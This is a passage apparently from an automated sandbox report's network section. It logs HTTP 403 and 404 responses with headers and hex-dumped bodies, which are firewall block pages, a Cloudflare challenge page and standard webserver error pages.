20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 22 Mar 2023 04:45:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15014X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 22 Mar 2023 04:45:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15015X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: BNP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 64 38 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kmHSnANLh4eTKn994T%2FDbFrzM%2FScx6jzKwTFkycs1HNFvkKUtLcMUljfj8WfUJPlSy6VKgpuUKktUivPLRyEikii9xRXRzLiCBS0MLxOMDgUNHhb5%2FBfU%2FU%2FCw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc9363933918f-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 63 33 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 Data Ascii: 1c33<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Mar 2023 04:45:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 246X-Sorting-Hat-ShopId: 9394790X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: a957ccf6-c758-41d0-860f-dd3eb6dbd7eaCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=h7pwXptIs1ZUfbHFSNXX0Paf6XYqX0V1K00l4UumjDhdCI5kK80xumyFtaOk%2BL9fmOr9JePRRGAqnh7ru9nFRhlb2I3IamjYPVNyKL%2BL3J4huejy2ybsp8EVg%2Flw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=163.000107Server: cloudflareCF-RAY: 7abbc9359b219a3f-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:35 GMTServer: ApacheLast-Modified: Fri, 10 Jun 2022 17:11:43 GMTETag: "2c8-5e11b08540544"Accept-Ranges: bytesContent-Length: 712Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 69 2d 4d 53 43 50 20 69 6e 74 65 72 6e 65 74 20 2d 20 4d 75 6c 74 69 20 53 65 72 76 65 72 20 43 6f 6e 74 72 6f 6c 20 50 61 6e 65 6c 20 2d 20 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 2d 4d 53 43 50 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 69 6e 64 65 78 27 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 65 72 72 6f 72 64 6f 63 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 2d 2d 5b 69 66 20 28 49 45 20 37 29 7c 28 49 45 20 38 29 5d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 69 65 37 38 6f 76 65 72 72 69 64 65 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6f 75 74 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 69 6e 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 45 72 72 6f 72 20 34 30 33 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 70 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 62 61 63 6b 6c 69 6e 6b 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 6f 6e 63 6c 69 63 6b 3d 22 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 67 6f 28 2d 32 29 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 42 61 63 6b 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <title>i-MSCP internet - Multi Server Control Panel - Error 403</title> <meta charset="utf-8"> <meta name="application-name" content="i-MSCP"> <meta name='robots' content='nofollow, noindex'> <link rel="icon" href="/errors/inc/favicon.ico"> <link rel="stylesheet" href="/errors/inc/errordocs.css"> <!--[if (IE 7)|(IE 8)]> <link rel="stylesheet" href="/errors/inc/ie78overrides.css"> <![endif]--></head><body><div id="outer"> <div id="inner"> <h1>Error 403</h1> <p>Fo
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:35 GMTServer: ApacheUpgrade: h2Connection: Upgrade, Keep-AliveX-Powered-By: PHP/7.3.33Content-Length: 0Keep-Alive: timeout=5, max=150Content-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:35 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openresty/1.15.8.2Date: Wed, 22 Mar 2023 04:45:35 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.15.8.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:35 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openresty/1.15.8.2Date: Wed, 22 Mar 2023 04:45:35 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 